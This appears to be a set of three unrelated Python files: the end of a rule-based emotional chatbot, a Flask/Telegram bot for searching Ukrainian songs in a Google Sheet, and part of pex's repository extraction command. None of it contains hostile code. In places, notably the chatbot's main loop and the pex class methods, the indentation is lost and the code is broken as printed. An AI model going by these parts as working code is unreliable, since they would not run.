    Entries can be referenced by name in reply templates via str.format,
    e.g. "{user_name}".  Also merges user-defined entries from
    feelings.json (each item supplies 'name' and 'val').
    """
    global VAR_REGISTRY
    VAR_REGISTRY = {
        "user_name": data['user']['name'],
        "name": data['name'],
        "response_count": len(convo),
        "user_hobby": data['user']['hobby'],
        "favorite_food": data['food'],
        "happy_level": emotions['happy'],
        "stress_level": emotions['stress'],
        "animosity": emotions['animosity']
    }
    feelings = json.load(open('feelings.json'))
    for i in feelings:
        VAR_REGISTRY[i['name']] = i['val']
build_registry()
def punctuation_stripper(statement):
    """Strip sentence punctuation ('.', '!', '?') from the statement's ends.

    Returns {'text': stripped_statement, 'punctuation': mark} where mark
    is the last of the three characters found anywhere in the input, or
    None when none occurs.  Note str.strip only removes end characters.
    """
    punctuation = None
    for mark in ('.', '!', '?'):
        if mark in statement:
            punctuation = mark
            statement = statement.strip(mark)
    return {"text": statement, "punctuation": punctuation}
def handle_modifiers(modifiers):
    """Apply a reply's emotional modifiers to the global variable registry.

    Each modifier is a dict with 'name' (a registry key) and 'val' (a
    delta added to that entry).
    """
    for i in modifiers:
        try:
            VAR_REGISTRY[i['name']] += i['val']
        except:
            # NOTE(review): bare except silently ignores malformed modifiers
            # and unknown registry names alike; consider narrowing.
            doNothing = True
def calc_qualifiers(qualifier):
    """Evaluate one reply qualifier against the variable registry.

    Supported qualifier shapes, tried in order via KeyError-driven
    fallthrough: {'name', '$gt'}, {'name', '$eq'}, {'name', '$lt'} and
    the legacy equality form {'name', 'val'}.  Returns True/False;
    qualifiers matching none of the shapes are rejected.
    """
    registryValue = VAR_REGISTRY[qualifier['name']]
    try:
        if registryValue > qualifier['$gt']:
            return True
        else:
            return False
    except:
        # Not a greater than qualifier
        doNothing = True
    try:
        if registryValue == qualifier['$eq']:
            return True
        else:
            return False
    except:
        # Not an equal to qualifier
        doNothing = True
    try:
        if registryValue < qualifier['$lt']:
            return True
        else:
            return False
    except:
        # Not a less than qualifier
        doNothing = True
    # Legacy qualifier types
    try:
        if registryValue == qualifier['val']:
            return True
        else:
            return False
    except:
        # Not a legacy 'val' equality qualifier
        doNothing = True
    # if supplied info doesn't fit any of the above qualifier types reject
    return False
# Pick a random option from supplied reply list using weights
def random_pick_weighted(reply_options):
    """Return one entry of reply_options chosen by weighted randomness.

    Each option must carry a numeric 'weight' key; heavier options are
    proportionally more likely to be picked.
    """
    option_weights = [option['weight'] for option in reply_options]
    chosen_index = random.choices(
        range(len(reply_options)), weights=option_weights, k=1)[0]
    return reply_options[chosen_index]
def get_response(input):
    """Produce a reply dict {'message', 'image'} for the user's input.

    Fuzzy-matches the input against every conversation starter with
    Levenshtein distance, filters each starter's replies through their
    qualifiers, picks one reply per accepted starter by weight, and
    returns the reply from the closest-matching starter.  Applies that
    reply's modifiers to VAR_REGISTRY as a side effect and formats the
    text against the registry.
    """
    # NOTE(review): 'input' shadows the builtin of the same name.
    sentimentValues = sentiment.assess(input)  # NOTE(review): result unused
    # Remove currently useless characters
    stripped = punctuation_stripper(input)
    input = stripped["text"]
    punctuation = stripped["punctuation"]
    possibilities = []
    for i in convo:
        for a in i['starters']:
            val = distance(input, a)
            # Heuristic acceptance: input length relative to edit distance.
            if len(input)/(val+1) > 1.5:
                reply_options = []
                for b in i['replies']:
                    should_add = False
                    try:
                        to_test = b['qualifiers']
                        for z in to_test:
                            if calc_qualifiers(z):
                                should_add = True
                            else:
                                do_nothing = True
                    except:
                        # Reply has no qualifiers: always eligible.
                        should_add = True
                    if should_add:
                        # Normalize optional reply fields with defaults.
                        to_add = {'text': b['text']}
                        try:
                            to_add['image'] = b['image']
                        except:
                            to_add['image'] = 'None'
                        try:
                            to_add['modifiers'] = b['modifiers']
                        except:
                            to_add['modifiers'] = []
                        try:
                            to_add['weight'] = b['weight']
                        except:
                            to_add['weight'] = 1
                        reply_options += [to_add]
                slimmed_reply = random_pick_weighted(reply_options)
                possibilities.append({
                    'val': val,
                    'response': slimmed_reply['text'],
                    'image': slimmed_reply['image'],
                    'weight': slimmed_reply['weight'],
                    'modifiers': slimmed_reply['modifiers']
                })
    # Pick the possibility with the smallest edit distance.
    min = 10000000000  # NOTE(review): shadows the builtin min()
    response = 'None'
    image = 'None'
    modifiers = []
    # print(possibilities)
    for i in possibilities:
        if i['val'] < min:
            response = i['response']
            image = i['image']
            modifiers = i['modifiers']
            min = i['val']
    handle_modifiers(modifiers)
    toReturn = {'message': response.format(**VAR_REGISTRY), 'image': image}
    return toReturn
input_queue = []  # messages read by the IO thread, consumed by the main loop
def threaded_input():
    """Continuously pull user input into input_queue (runs in a thread).

    Only one pending message is held at a time; myIO.get() is expected to
    block until input is available.
    """
    while True:
        if len(input_queue) == 0:
            input_queue.append(myIO.get());
ticker = 0  # counts event_check invocations
# Seed each event's 'last' with the current metric value so threshold
# crossings are only announced when the value actually moves.
events = json.load(open('events.json'))
for i in range(len(events)):
    metric = events[i]['metric']
    val = VAR_REGISTRY[metric]
    events[i]['last'] = val
def event_check():
    """Announce events whose metric just crossed its threshold.

    '$gt' events fire when the metric rises above 'level'; '$lt' events
    when it falls below.  The previous value is tracked in 'last' so a
    crossing is announced once per change.
    """
    global ticker
    ticker += 1
    for i in range(len(events)):
        metric = events[i]['metric']
        val = VAR_REGISTRY[metric]
        if events[i]['type'] == '$gt':
            if val > events[i]['level'] and events[i]['last'] < val:
                myIO.put(events[i]['response'])
        elif events[i]['type'] == '$lt':
            if val < events[i]['level'] and events[i]['last'] > val:
                myIO.put(events[i]['response'])
        events[i]['last'] = val
if __name__ == "__main__":
logFile = open('log.txt', 'a')
secureLogger = MessageStats("secure_log.json")
secureLogger.load_log()
myIO.put("Booting...")
ioThread = Thread(target = threaded_input)
myIO.put("{} online.".format(data['name']))
ioThread.start()
terminated = False
while not terminated:
event_check()
if len(input_queue) > 0:
statement = input_queue[0]
del input_queue[0]
response = get_response(statement.lower())
myIO.put(response['message'])
secureLogger.log_occurence(response['message'])
ender = '\n'
logFile.write('Q: ' + statement + ender)
if not response == None:
logFile.write('R: ' + response['message'] + ender)
else:
logFile.write('R: None' + ender)
if statement == "quit":
terminated = True
sleep(0.1)
emotionFile = open('emotions.json', 'w')
emotionFile.write(json.dumps(emotions))
emotionFile.close()
secureLogger.save_log()
|
app.py | import os
import logging
from queue import Queue
from threading import Thread, Timer
import requests
from flask import Flask, request
from telegram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton, Bot, Update
from telegram.ext import CommandHandler, MessageHandler, Filters, Dispatcher
import pygsheets
import json
import time
class User:
    """Per-chat state the bot keeps for each Telegram user."""

    def __init__(self, chat_id, username, text):
        self.chat_id = chat_id    # Telegram chat identifier
        self.username = username  # Telegram username
        self.text = text          # whether song lyrics are sent to this user
        self.switch = None        # active search field (title/artist/text)
        self.searching = False    # True while a free-text search is pending
        self.last_msg = None      # id of the bot's last keyboard message

    def change_text(self):
        """Toggle whether song lyrics are included in replies."""
        self.text = not self.text
class GSheetsManager:
    """In-memory snapshot of the 'Spivanik_songs' Google sheet.

    The sheet is re-fetched every `timeout` seconds via a
    self-rescheduling Timer, so `data` is an eventually-fresh cache of
    all song rows.
    """
    def __init__(self):
        self.client = pygsheets.authorize(service_account_env_var='GOOGLE_API')
        self.sheet = self.client.open('Spivanik_songs').sheet1
        self.data = self.sheet.get_all_records(empty_value='', head=1, majdim='ROWS', numericise_data=True)
        self.timeout = 10.0  # refresh period, seconds
        Timer(self.timeout, self.update_data).start()
    def update_data(self):
        """Refresh the cached sheet data and reschedule the next refresh."""
        self.data = self.sheet.get_all_records(empty_value='', head=1, majdim='ROWS', numericise_data=True)
        Timer(self.timeout, self.update_data).start()
    def get_parsed_categories(self):
        """Return the unique song categories, in first-seen order."""
        parsed_categories = []
        for row in self.data:
            # A row may belong to several ';'-separated categories.
            for category in row['Категорії'].split(';'):
                if category not in parsed_categories:
                    parsed_categories.append(category)
        return parsed_categories
    def get_songs_for_category(self, category):
        """Return every song row whose category field contains `category`."""
        songs = []
        for row in self.data:
            if category in row['Категорії']:
                songs.append(row)
        return songs
    def get_songs_for_search(self, key, position):
        """Case-insensitive substring search for `key` in column `position`."""
        songs = []
        for row in self.data:
            try:
                if key.lower() in row[position].lower():
                    songs.append(row)
            except AttributeError:  # The song has no text in this column, so the search cannot run
                print("Нема тексту")
        return songs
app = Flask(__name__)
TELEGRAM_TOKEN = os.environ["TELEGRAM_TOKEN"]  # Telegram token
users = []  # in-memory registry of every User that has /start-ed the bot
# Enable logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
# /start
def start(update, context):
    """Handle /start: greet, register the user and show the help text."""
    update.message.reply_text('Тебе вітає СБ!💙💛')
    chat = update.message["chat"]
    check_if_user_in_users(chat)
    # NOTE(review): `help` here is the local handler, shadowing the builtin.
    help(update, context)
    del chat
# /about
def about(update, context):
    """Handle /about: describe the bot and its author contact."""
    update.message.reply_text('Це бот для пошуку українських пісень. Якщо маєш якість коментарі, то пиши @bohdanho')
# /help
def help(update, context):
    """Handle /help: list the available bot commands."""
    update.message.reply_text('Вибирай потрібну команду:\n'
                              '/help - Список доступних команд\n'
                              '/about - Дізнатись більше про СБ\n'
                              '/settings - Змінити налаштування\n'
                              '/spiv - Пошук пісень')
# /settings
def settings(update, context):
    """Handle /settings: offer to toggle whether song lyrics are sent."""
    chat_id = update.message["chat"]["id"]
    user = find_user(chat_id)
    user.searching = False  # opening settings leaves any pending search mode
    if user.text:
        reply_text = "У тебе ввімкнуте отримання текстів"
        reply_keyboard = [['Вимкнути'],
                          ['Назад']]
    else:
        reply_text = "У тебе вимкнуте отримання текстів"
        reply_keyboard = [['Ввімкнути'],
                          ['Назад']]
    # Remember the bot message id so it can be deleted on navigation.
    msg_id = update.message.reply_text(reply_text, reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))["message_id"]
    user.last_msg = msg_id
# /spiv
def spiv(update, context):
    """Handle /spiv: present the top-level song search menu."""
    reply_keyboard = [['Пошук пісні', 'Категорії'],
                      ['В головне меню']]
    msg_id = update.message.reply_text("Вибери метод пошуку: ", reply_markup=ReplyKeyboardMarkup(reply_keyboard, one_time_keyboard=True))["message_id"]
    chat_id = update.message["chat"]["id"]
    user = find_user(chat_id)
    user.searching = False  # entering the menu cancels any pending search
    user.last_msg = msg_id
# Song search from the first keyboard, by different methods
def music_search(update, user):
    """Show the keyboard for choosing a search field (title/artist/lyrics)."""
    music_search_keyboard = [['За назвою'], ['За виконавцем'], ['За текстом'], ['Назад до пошуку']]
    msg_id = update.message.reply_text("Вибери за чим проводити пошук: ",
                                       reply_markup=ReplyKeyboardMarkup(music_search_keyboard, one_time_keyboard=True))["message_id"]
    user.last_msg = msg_id
# Categories option from the first keyboard
def categories(update, user):
    """Show a keyboard listing every song category from the sheet."""
    parsed_categories = gsheets_manager.get_parsed_categories()
    categories_keyboard = []
    for item in parsed_categories:
        categories_keyboard.append([item])
    categories_keyboard.append(['Назад до пошуку'])
    msg_id = update.message.reply_text("Вибери категорію: ",
                                       reply_markup=ReplyKeyboardMarkup(categories_keyboard, one_time_keyboard=True))["message_id"]
    user.last_msg = msg_id
# Non-command message
def echo(update, context):
    """Route every non-command message through the keyboard state machine.

    The message text is matched against the known keyboard buttons; when
    the user is in search mode, the text is treated as the search query.
    """
    chat_id = update.message["chat"]["id"]
    user = find_user(chat_id)
    # Parse categories to detect messages coming from the categories keyboard
    parsed_categories = gsheets_manager.get_parsed_categories()
    # Settings change
    if update.message.text == "Вимкнути" or update.message.text == "Ввімкнути":
        user.change_text()
        delete_2_messages(update, user.last_msg)
    elif update.message.text == "В головне меню":
        # Just in case, clear the user's search state if they abandoned the search and went back
        user.searching = False
        delete_2_messages(update, user.last_msg)
    # Search methods or categories
    elif update.message.text == "Пошук пісні":
        delete_2_messages(update, user.last_msg)
        music_search(update, user)
    elif update.message.text == "Категорії":
        delete_2_messages(update, user.last_msg)
        categories(update, user)
    # Back-navigation buttons
    elif update.message.text == 'Назад':
        delete_2_messages(update, user.last_msg)
    elif update.message.text == 'Назад до пошуку':
        delete_2_messages(update, user.last_msg)
        spiv(update, context)
    elif update.message.text == 'Назад до категорій':
        delete_2_messages(update, user.last_msg)
        categories(update, user)
    elif update.message.text == 'Назад до методів пошуку':
        # Just in case, clear the user's search state if they abandoned the search and went back
        user.searching = False
        delete_2_messages(update, user.last_msg)
        music_search(update, user)
    # Search by category
    elif update.message.text in parsed_categories:
        delete_2_messages(update, user.last_msg)
        parsed_songs = gsheets_manager.get_songs_for_category(update.message.text)
        send_songs(update, parsed_songs, user.text)
        msg_id = update.message.reply_text("Що далі? :)",
                                           reply_markup=ReplyKeyboardMarkup([["Назад до категорій"], ["В головне меню"]],
                                                                            one_time_keyboard=True))["message_id"]
        user.last_msg = msg_id
        del parsed_songs
    # The different search methods: each arms search mode with its field
    elif update.message.text == 'За назвою':
        delete_2_messages(update, user.last_msg)
        msg_id = update.message.reply_text("Введи назву пісні: ",
                                           reply_markup=ReplyKeyboardMarkup([["Назад до методів пошуку"], ["В головне меню"]], one_time_keyboard=True))["message_id"]
        user.last_msg = msg_id
        user.switch = 'Назва'
        user.searching = True
    elif update.message.text == 'За виконавцем':
        delete_2_messages(update, user.last_msg)
        msg_id = update.message.reply_text("Введи ім'я виконавця: ",
                                           reply_markup=ReplyKeyboardMarkup([["Назад до методів пошуку"], ["В головне меню"]],
                                                                            one_time_keyboard=True))["message_id"]
        user.last_msg = msg_id
        user.switch = 'Виконавець'
        user.searching = True
    elif update.message.text == 'За текстом':
        delete_2_messages(update, user.last_msg)
        msg_id = update.message.reply_text("Введи частину тексту: ",
                                           reply_markup=ReplyKeyboardMarkup([["Назад до методів пошуку"], ["В головне меню"]],
                                                                            one_time_keyboard=True))["message_id"]
        user.last_msg = msg_id
        user.switch = 'Текст'
        user.searching = True
    elif user.searching:
        # Searching for songs in user-selected way with correlation to position in Songs table in DB
        parsed_songs = gsheets_manager.get_songs_for_search(update.message.text, user.switch)
        send_songs(update, parsed_songs, user.text)
        msg_id = update.message.reply_text("Що далі? :)", reply_markup=ReplyKeyboardMarkup(
            [["Назад до методів пошуку"], ["В головне меню"]],
            one_time_keyboard=True))["message_id"]
        user.last_msg = msg_id
        user.searching = False
        del parsed_songs  # Deleting used data to avoid overfilling the RAM
    else:  # Answer on every other message
        update.message.reply_text("Дякую, що написав, " + update['message']['chat']['first_name'] + ", ми обов'язково подумаємо над цим")
    del parsed_categories  # Deleting used data to avoid overfilling the RAM
# If error happens
def error(update, context):
    """Log any error raised while processing an update."""
    logger.warning('Update "%s" caused error "%s"', update, context.error)
def check_if_user_in_users(chat):
    """Register chat's user in the global `users` list if not yet present.

    Returns 1 when the user is already known; otherwise appends a new
    User (with lyrics enabled) and implicitly returns None, matching the
    original contract.
    """
    global users
    chat_id = chat["id"]
    if any(existing.chat_id == chat_id for existing in users):
        return 1
    users.append(User(chat_id, chat["username"], True))
def find_user(chat_id):
    """Return the registered User with the given chat_id, or None."""
    global users
    return next((known for known in users if known.chat_id == chat_id), None)
# Compose and send messages with the songs pulled from the DB, embedding all available content
def send_songs(update, parsed_songs, text=None):
    """Send one Telegram message per song row in parsed_songs.

    `text` controls whether lyrics are appended.  Chord and clip links
    become inline buttons; when a tabs link is present the message is
    sent as a photo with the composed string as its caption.
    """
    if parsed_songs:
        for song in parsed_songs:
            inline_keyboard = []
            message_string = f'🏷 "{song["Назва"].upper()}"\n🎤 Виконавець: {song["Виконавець"]}\n💿 Жанр: {song["Категорії"]}\n'
            # Check for the presence of each optional attribute in the row
            if song['Текст'] and text:
                message_string += f"📜 Текст:\n{song['Текст']}"
            if song['Акорди'] and "http" in song['Акорди']:
                inline_keyboard.append([InlineKeyboardButton(text="Акорди 🎼", url=song['Акорди'])])
            if song['Кліп'] and "http" in song['Кліп']:
                inline_keyboard.append([InlineKeyboardButton(text="Кліп 🎬", url=song['Кліп'])])
            if song['Таби'] and "http" in song['Таби']:
                # inline_keyboard.append([InlineKeyboardButton(text="Таби 🎶", url=song['Таби'])])
                bot.send_photo(chat_id=update.message['chat']['id'], photo=song['Таби'], caption=message_string, reply_markup=InlineKeyboardMarkup(inline_keyboard))
            else:
                update.message.reply_text(message_string, reply_markup=InlineKeyboardMarkup(inline_keyboard))
            del inline_keyboard, message_string  # Deleting used data to avoid overfilling the RAM
    else:
        update.message.reply_text("Нічого не знайдено :(")
    del parsed_songs  # Deleting used data to avoid overfilling the RAM
# Delete previous 2 messages after returning to the previous stage via custom keyboard
def delete_2_messages(update, bot_message_id=None):
    """Delete the user's last message and the bot's previous keyboard message.

    When bot_message_id is falsy, the message directly preceding the
    user's one is assumed to be the bot's.
    """
    chat_id = update["message"]["chat"]["id"]
    last_message_id = update["message"]["message_id"]
    if not bot_message_id:
        bot_message_id = update["message"]["message_id"] - 1
    requests.get(f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/deleteMessage?chat_id={chat_id}&message_id={last_message_id}")
    requests.get(f"https://api.telegram.org/bot{TELEGRAM_TOKEN}/deleteMessage?chat_id={chat_id}&message_id={bot_message_id}")
@app.route('/send_message', methods=['GET', 'POST'])
def send_message():
    """Broadcast a JSON {'message': ...} POST body to every known user.

    NOTE(review): no value is returned, so Flask will error on the
    response — confirm whether a "OK" return was intended.
    """
    if request.method == "POST":
        message = json.loads(request.get_json(force=True))
        for user in users:
            bot.send_message(chat_id=user.chat_id, text=message["message"])
            time.sleep(0.04)  # throttle to stay under Telegram rate limits
# Receiving every update from telegram on webhook
@app.route(f'/{TELEGRAM_TOKEN}', methods=['GET', 'POST'])
def webhook():
    """Receive a Telegram update and hand it to the dispatcher queue."""
    if request.method == "POST":
        # retrieve the message in JSON and then transform it to Telegram object
        update = Update.de_json(request.get_json(force=True), bot=bot)
        logger.info("Update received! " + update.message.text)
        update_queue.put(update)
        return "OK"
    else:
        return "BAD"
# Launching the Dispatcher
def launch_dispatcher():
    """Register all handlers on the global Dispatcher and start it in a thread."""
    # Different command handlers
    dp.add_handler(CommandHandler("start", start))
    dp.add_handler(CommandHandler("about", about))
    dp.add_handler(CommandHandler("help", help))
    dp.add_handler(CommandHandler("spiv", spiv))
    dp.add_handler(CommandHandler("settings", settings))
    # On message
    dp.add_handler(MessageHandler(Filters.text, echo))
    # log all errors
    dp.add_error_handler(error)
    # start the dispatcher in different thread to process every update
    thread = Thread(target=dp.start, name='dp')
    thread.start()
# Starting the application
if __name__ == '__main__':
    bot = Bot(TELEGRAM_TOKEN)  # Creating the Bot object with TELEGRAM_TOKEN
    update_queue = Queue()  # Creating the Queue for the Dispatcher
    dp = Dispatcher(bot, update_queue)  # Creating the Dispatcher object
    launch_dispatcher()  # Preparing and launching the Dispatcher
    # Re-register the webhook so Telegram delivers updates to this deployment.
    bot.deleteWebhook(drop_pending_updates=True)
    bot.setWebhook(f"https://sbbotapp.herokuapp.com/{TELEGRAM_TOKEN}")  # Setting the WebHook for bot to receive updates
    #bot.setWebhook(f"https://testflasksbbot.herokuapp.com/{TELEGRAM_TOKEN}")  # Setting the WebHook for bot to receive updates
    gsheets_manager = GSheetsManager()
    app.run(host="0.0.0.0", port=int(os.environ.get('PORT', 5000)), threaded=True)  # Launching the Flask app on appropriate IP and PORT
|
repository.py | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import functools
import logging
import os
import re
import shutil
import subprocess
from argparse import ArgumentParser, _SubParsersAction
from contextlib import contextmanager
from textwrap import dedent
from threading import Thread
from pex import dist_metadata
from pex.commands.command import Error, JsonMixin, Ok, OutputMixin, Result
from pex.common import (
DETERMINISTIC_DATETIME_TIMESTAMP,
pluralize,
safe_mkdir,
safe_mkdtemp,
safe_open,
)
from pex.compatibility import Queue
from pex.environment import PEXEnvironment
from pex.interpreter import PythonIdentity, PythonInterpreter, spawn_python_job
from pex.jobs import Retain, SpawnedJob, execute_parallel
from pex.pex import PEX
from pex.third_party.pkg_resources import Distribution
from pex.tools.command import PEXCommand
from pex.typing import TYPE_CHECKING, cast
if TYPE_CHECKING:
import attr # vendor:skip
from typing import Callable, IO, Iterable, Iterator, Text, Tuple
RepositoryFunc = Callable[["Repository", PEX], Result]
else:
from pex.third_party import attr
logger = logging.getLogger(__name__)
@attr.s(frozen=True)
class FindLinksRepo(object):
    """A local HTTP server process serving a directory as a find-links repo."""

    @classmethod
    def serve(
        cls,
        interpreter,  # type: PythonInterpreter
        port,  # type: int
        directory,  # type: str
    ):
        # type: (...) -> FindLinksRepo
        """Launch `python -m http.server` (SimpleHTTPServer on Python 2) in
        `directory` and return a handle once the bound port is known."""
        http_server_module = "SimpleHTTPServer" if interpreter.version[0] == 2 else "http.server"
        cmd, http_server_process = interpreter.open_process(
            # N.B.: Running Python in unbuffered mode here is critical to being able to read stdout.
            args=["-u", "-m", http_server_module, str(port)],
            cwd=directory,
            stdout=subprocess.PIPE,
        )
        # The server may have been asked for port 0 (ephemeral); parse the
        # port it actually bound from its first stdout line.
        real_port = Queue()  # type: Queue[int]

        def read_data():
            try:
                data = http_server_process.stdout.readline()
                match = re.match(br"^Serving HTTP on [^\s]+ port (?P<port>\d+)[^\d]", data)
                real_port.put(int(match.group("port")))
            finally:
                # NOTE(review): if readline/match fails, put() never runs and
                # real_port.join() below can block forever — confirm intended.
                real_port.task_done()

        reader = Thread(target=read_data)
        reader.daemon = True
        reader.start()
        real_port.join()
        reader.join()
        return cls(cmd=cmd, port=real_port.get(), server_process=http_server_process)

    cmd = attr.ib()  # type: Iterable[str]
    port = attr.ib()  # type: int
    _server_process = attr.ib()  # type: subprocess.Popen

    @property
    def pid(self):
        # type: () -> int
        """Pid of the serving process."""
        return self._server_process.pid

    def join(self):
        # type: () -> int
        """Block until the server exits and return its exit code."""
        return self._server_process.wait()

    def kill(self):
        # type: () -> None
        """Forcibly terminate the server process."""
        self._server_process.kill()
class Repository(JsonMixin, OutputMixin, PEXCommand):
"""Interact with the Python distribution repository contained in a PEX file."""
@classmethod
def _add_info_arguments(cls, subparsers):
    # type: (_SubParsersAction) -> ArgumentParser
    """Register the `info` subcommand and return its parser."""
    info_parser = subparsers.add_parser(
        name="info", help="Print information about the distributions in a PEX file."
    )
    info_parser.add_argument(
        "-v",
        "--verbose",
        action="store_true",
        help="Print the distributions requirements in addition to its name version and path.",
    )
    cls.add_json_options(info_parser, entity="verbose output")
    cls.register_global_arguments(info_parser, include_verbosity=False)
    return info_parser
@classmethod
def _add_extract_arguments(cls, subparsers):
    # type: (_SubParsersAction) -> ArgumentParser
    """Register the `extract` subcommand and return its parser."""
    extract_parser = subparsers.add_parser(
        name="extract", help="Extract all distributions from a PEX file."
    )
    extract_parser.add_argument(
        "-f",
        "--dest-dir",
        "--find-links",
        "--repo",
        metavar="PATH",
        help="The path to extract distribution as wheels to.",
    )
    extract_parser.add_argument(
        "-D",
        "--sources",
        action="store_true",
        help="Also extract a wheel for the PEX file sources.",
    )
    extract_parser.add_argument(
        "--use-system-time",
        dest="use_system_time",
        default=False,
        action="store_true",
        help=(
            "Use the current system time to generate timestamps for the extracted "
            "distributions. Otherwise, Pex will use midnight on January 1, 1980. By using "
            "system time, the extracted distributions will not be reproducible, meaning that "
            "if you were to re-run extraction against the same PEX file then the newly "
            "extracted distributions would not be byte-for-byte identical distributions "
            "extracted in prior runs."
        ),
    )
    extract_parser.add_argument(
        "--serve",
        action="store_true",
        help="Serve the --find-links repo.",
    )
    extract_parser.add_argument(
        "--port",
        type=int,
        default=0,
        metavar="PORT",
        help="The port to serve the --find-links repo on.",
    )
    extract_parser.add_argument(
        "--pid-file",
        metavar="PATH",
        help="The path of a file to write the <pid>:<port> of the find links server to.",
    )
    cls.register_global_arguments(extract_parser)
    return extract_parser
@classmethod
def add_arguments(cls, parser):
    # type: (ArgumentParser) -> None
    """Wire up the repository subcommands; with no subcommand, show help."""
    cls.add_output_option(parser, entity="distribution information")
    parser.set_defaults(repository_func=functools.partial(cls.show_help, parser))
    subparsers = parser.add_subparsers(
        description=(
            "A PEX distribution repository can be operated on using any of the following "
            "subcommands."
        )
    )
    cls._add_info_arguments(subparsers).set_defaults(repository_func=cls._info)
    cls._add_extract_arguments(subparsers).set_defaults(repository_func=cls._extract)
def run(self, pex):
    # type: (PEX) -> Result
    """Dispatch to the subcommand selected during argument parsing."""
    repository_func = cast("RepositoryFunc", self.options.repository_func)
    return repository_func(self, pex)
@contextmanager
def _distributions_output(self, pex):
    # type: (PEX) -> Iterator[Tuple[Iterable[Distribution], IO]]
    """Yield the PEX's resolved distributions plus the configured output stream."""
    with self.output(self.options) as out:
        yield tuple(pex.resolve()), out
def _info(self, pex):
    # type: (PEX) -> Result
    """Print name/version/location (plus requirements as JSON with -v) for
    every distribution in the PEX."""
    with self._distributions_output(pex) as (distributions, output):
        for distribution in distributions:
            if self.options.verbose:
                requires_python = dist_metadata.requires_python(distribution)
                requires_dists = list(dist_metadata.requires_dists(distribution))
                self.dump_json(
                    self.options,
                    dict(
                        project_name=distribution.project_name,
                        version=distribution.version,
                        requires_python=str(requires_python) if requires_python else None,
                        requires_dists=[str(dist) for dist in requires_dists],
                        location=distribution.location,
                    ),
                    output,
                )
            else:
                # Terse single-line form when not verbose.
                output.write(
                    "{project_name} {version} {location}".format(
                        project_name=distribution.project_name,
                        version=distribution.version,
                        location=distribution.location,
                    )
                )
            output.write("\n")
    return Ok()
def _extract(self, pex):
    # type: (PEX) -> Result
    """Extract the PEX's distributions as wheels into --dest-dir, optionally
    building a sources wheel and serving the result as a find-links repo."""
    if not self.options.serve and not self.options.dest_dir:
        return Error("Specify a --find-links directory to extract wheels to.")
    dest_dir = (
        os.path.abspath(os.path.expanduser(self.options.dest_dir))
        if self.options.dest_dir
        else safe_mkdtemp()
    )
    safe_mkdir(dest_dir)
    if self.options.sources:
        self._extract_sdist(pex, dest_dir)
    def spawn_extract(distribution):
        # type: (Distribution) -> SpawnedJob[Text]
        # Repack each resolved distribution into a wheel via `wheel pack`.
        env = os.environ.copy()
        if not self.options.use_system_time:
            # N.B.: The `SOURCE_DATE_EPOCH` env var is semi-standard magic for controlling
            # build tools. Wheel has supported this since 2016.
            # See:
            # + https://reproducible-builds.org/docs/source-date-epoch/
            # + https://github.com/pypa/wheel/blob/1b879e53fed1f179897ed47e55a68bc51df188db/wheel/archive.py#L36-L39
            env.update(SOURCE_DATE_EPOCH=str(int(DETERMINISTIC_DATETIME_TIMESTAMP)))
        job = spawn_python_job(
            args=["-m", "wheel", "pack", "--dest-dir", dest_dir, distribution.location],
            interpreter=pex.interpreter,
            expose=["wheel"],
            stdout=subprocess.PIPE,
            env=env,
        )
        return SpawnedJob.stdout(
            job, result_func=lambda out: "{}: {}".format(distribution, out.decode())
        )
    with self._distributions_output(pex) as (distributions, output):
        # Run the wheel builds in parallel, retaining per-distribution errors.
        errors = []
        for result in execute_parallel(distributions, spawn_extract, error_handler=Retain()):
            if isinstance(result, tuple):
                distribution, error = result
                errors.append(distribution)
                output.write(
                    "Failed to build a wheel for {distribution}: {error}\n".format(
                        distribution=distribution, error=error
                    )
                )
            else:
                output.write(result)
        if errors:
            return Error(
                "Failed to build wheels for {count} {distributions}.".format(
                    count=len(errors), distributions=pluralize(errors, "distribution")
                )
            )
        if not self.options.serve:
            return Ok()
        # Serve the extracted wheels as a local find-links repository.
        repo = FindLinksRepo.serve(
            interpreter=pex.interpreter, port=self.options.port, directory=dest_dir
        )
        output.write(
            "Serving find-links repo of {pex} via {find_links} at http://localhost:{port}\n".format(
                pex=os.path.normpath(pex.path()), find_links=dest_dir, port=repo.port
            )
        )
        if self.options.pid_file:
            # Record <pid>:<port> so external tooling can manage the server.
            with safe_open(self.options.pid_file, "w") as fp:
                fp.write("{}:{}".format(repo.pid, repo.port))
        try:
            return Result(exit_code=repo.join(), message=" ".join(repo.cmd))
        except KeyboardInterrupt:
            repo.kill()
            return Ok("Shut down server for find links repo at {}.".format(dest_dir))
    @staticmethod
    def _extract_sdist(
        pex,  # type: PEX
        dest_dir,  # type: str
    ):
        # type: (...) -> None
        """Repackage the user code of ``pex`` as a source distribution in ``dest_dir``.

        Copies the mounted PEX contents (minus PEX internals) into a temp chroot,
        synthesizes a declarative ``setup.cfg``/``setup.py``/``MANIFEST.in``, and runs
        ``setup.py sdist`` with the PEX's own interpreter.
        """
        pex_info = pex.pex_info()

        chroot = safe_mkdtemp()
        pex_path = pex.path()
        src = os.path.join(chroot, "src")
        # PEX runtime files must not leak into the sdist payload.
        excludes = ["__main__.py", pex_info.PATH, pex_info.bootstrap, pex_info.internal_cache]
        shutil.copytree(
            PEXEnvironment.mount(pex_path).path, src, ignore=lambda _dir, _names: excludes
        )

        name, _ = os.path.splitext(os.path.basename(pex_path))
        # Local version segment ties the sdist to the exact code it was built from.
        version = "0.0.0+{}".format(pex_info.code_hash)
        zip_safe = False  # Since PEX files never require code to be zip safe, assume it isn't.
        py_modules = [os.path.splitext(f)[0] for f in os.listdir(src) if f.endswith(".py")]
        # Every directory under src/ becomes a dotted package name.
        packages = [
            os.path.relpath(os.path.join(root, d), src).replace(os.sep, ".")
            for root, dirs, _ in os.walk(src)
            for d in dirs
        ]

        install_requires = [str(req) for req in pex_info.requirements]

        python_requires = None
        if len(pex_info.interpreter_constraints) == 1:
            # A single interpreter constraint maps cleanly onto python_requires.
            python_requires = str(
                PythonIdentity.parse_requirement(pex_info.interpreter_constraints[0]).specifier
            )
        elif pex_info.interpreter_constraints:
            # Multiple constraints can't be expressed as one specifier; warn and omit.
            logger.warning(
                "Omitting `python_requires` for {name} sdist since {pex} has multiple "
                "interpreter constraints:\n{interpreter_constraints}".format(
